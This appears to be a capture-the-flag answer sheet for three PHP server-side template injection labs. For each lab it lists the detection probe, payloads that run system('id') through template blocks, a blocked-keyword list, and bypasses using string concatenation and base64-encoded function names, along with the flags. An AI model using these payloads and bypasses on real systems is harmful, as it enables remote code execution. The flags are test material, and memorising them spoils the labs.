Lab 1 - Basic SSTI Detection:
  Probe: ?name=7*7
  If output shows 49, the template evaluates expressions.
  Flag: flag{ssti_basic_detection_math_probe}

Lab 2 - SSTI to RCE:
  The template engine uses eval() on {%% code %%} blocks.
  Payload: {%% echo system('id'); %%}
  Or via expression: {{system('id')}}
  Using any of: system, exec, passthru, shell_exec, phpinfo triggers the flag.
  Flag: flag{ssti_rce_eval_template_engine}

Lab 3 - Filter Bypass:
  Blocked keywords: system, exec, passthru, shell_exec, popen, proc_open, eval
  Bypass via string concat: ?name=call_user_func('sys'.'tem','id')
  Or: ?name=base64_decode('c3lzdGVt')('id')  (base64 of "system")
  Flag: flag{ssti_filter_bypass_variable_function}